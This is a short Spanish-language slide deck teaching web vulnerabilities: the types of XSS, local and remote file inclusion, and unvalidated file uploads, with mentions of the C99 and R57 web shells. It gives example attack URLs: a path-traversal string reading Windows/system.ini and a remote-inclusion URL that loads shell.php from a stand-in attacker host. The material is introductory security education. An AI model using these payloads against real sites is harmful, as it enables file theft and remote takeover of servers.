Vulnerabilidades web

Agenda

  • XSS
  • LFI y RFI
  • No validar archivos de subida

XSS

Cross-site scripting

xss almacenados

También conocidos como persistentes o tipo i ocurre cuando un atacante almacena en un servidor objetivo el cual puede ser un comentario, mensaje, log de visitas, etc.

xss reflejados

También conocidos como no persistentes o tipo ii ocurre inmediatamente cuando un usuario realiza alguna operación sobre la página, por ejemplo realiza una búsqueda y cuando la página es renderizada, se muestra modificada por el código malicioso del atacante.

xss reflejados

xss basados en dom También conocido como tipo 0 es diferente a los anteriores, debido a que en este caso la respuesta http no cambia, sino que viene la original desde el servidor, sin embargo el atacante puede agregar código JavaScript al link que comparte a la víctima, para que venga con la información original desde el servidor, pero es modificada debido al código JavaScript que él agregó

Ejemplo

https://xss-game.appspot.com/level1

Tratar de encontrar una pagina vulnerable a XSS

http://www.xssed.com/

Pagina con XSS vulnerables

LFI / RFI

LFI (local file inclusion)

Para entender más esta vulnerabilidad tome de ejemplo una página llamada www.pagina.com la cuál muestra toda la información de la empresa, sin embargo, tiene una dirección como la siguiente http://www.pagina.com/show.asp?view=articulos.html la cual carga todos los artículos de la organización y se los muestra a posibles clientes, sin embargo un atacante modifica esta dirección de la siguiente manera http://www.pagina.com/show. asp?view=../../../../../Windows/system.ini o incluso busca algún archivo de configuración para obtener la información de la base de datos

RFI (remote file inclusion)

Este tipo de ataque es similar al anterior, solo que en vez de incluir un archivo local al del servidor, puede incluir archivo que se encuentre en cualquier otro servidor. Una dirección de este tipo de ataque se vería de la siguiente manera: http://www.pagina.com/ show.php?file=http://www.hackerpage.com/shell.php

No validar archivos de subida

Esta vulnerabilidad es la no restricción o incorrecta validación de los archivos a una página. Para entender esto un poco mejor, tómese de ejemplo una página que ofrece la posibilidad de subir imágenes, para después poder compartir el link en cualquier otra página. Si el programador no realiza una correcta validación del tipo de archivo con los metadatos del archivo, podría permitir subir al atacante un archivo debidamente modificado haciéndolo pasar por una imágen, para tomar el control de toda la página.

Shells C99 y R57

Vulnerabilidades web

By Irving Norehem Llamas Covarrubias

Made with Slides.com

Vulnerabilidades web

  • 181

More from Irving Norehem Llamas Covarrubias